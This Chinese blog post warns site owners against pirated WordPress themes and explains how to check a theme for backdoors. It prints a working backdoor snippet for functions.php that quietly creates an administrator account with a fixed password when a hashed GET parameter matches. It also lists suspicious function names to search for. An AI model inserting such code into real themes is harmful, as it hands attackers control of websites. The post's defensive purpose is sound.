为什么劝你不要使用WordPress 盗版主题？

大家好！我是知行客。

一个草根网创博主（知行研习社），致力于打造长期被动收益项目，专注于研究如何利用一部手机、一台电脑轻松变现。

因为没有无缘无故的免费，小心WordPress盗版主题里暗藏后门！

wordpress主题有免费的和付费的，但在使用过程中，有的网站为了想要得到付费的，通常不会买版权方的，而是直接购买的破解版，这种行为知行客这边非常不建议，因为不是正版的，后期一段时间就会出问题，非常影响搜索引擎对网站的友好度。

下面给大家看看这个常见的后门代码

add_action( ‘wp_head’, ‘wp_backdoor’ );
function wp_backdoor() {undefined
if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’
) {undefined
require( ‘wp-includes/registration.php’ );
if ( !username_exists( ‘backdoor’ ) ) {undefined
$user_id = wp_create_user( ‘backdoor’, ‘123456’ );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
}

由以上的代码我们可以看出，如果把这段代码插入到你的主题函数文件functions.php中的话，然后就会自动创建一个用户名为backdoor，密码为123456的有管理员权限的账户，然后恶意人员就可以登录到你的网站后台获得管理员权限，也就是说，网站后台被拿到shell，后果你可以自己想象一下。

所以搜刮在这里建议大家不要随便乱使用WordPress的盗版主题，支持正版。

哪如何检测Wordpress主题是否有后门呢？

第一种使用工具检测（插件检测）主题方法：

安装插件方法：

WordPress后台——外观——TAC——启动Theme Authenticity Checker安全检测插件

然后就会自动检测，如果出现全部为绿色，则表示没有任何后门

如果有异常请点击Details产看，并按照路径进行相关处理

第二种使用手动检测主题方法：

使用ftp工具查看源码：找到fuctions.php这个文件

查看是否包含以下函数：

function __popular_posts

function stripos

function scandir

function _getprepare_widget

add_action(“init”, “_getprepare_widget”);

function _get_allwidgets_cont

function strripos

function _checkactive_widgets

add_action(“admin_head”, “_checkactive_widgets”);

第三种使用文件同步对比法检测主题方法：

首先在wordpress官网下载跟你源码相同版本的代码

找到下载源码中的fuctions.php与你的程序源码的fuctions.php进行对比

对比的时候请注意，如果对比出现红色的可以询问相关技术人员，或者在网上进行搜索

对比推荐使用软件Beyond Compare 4点击进行文本对比即可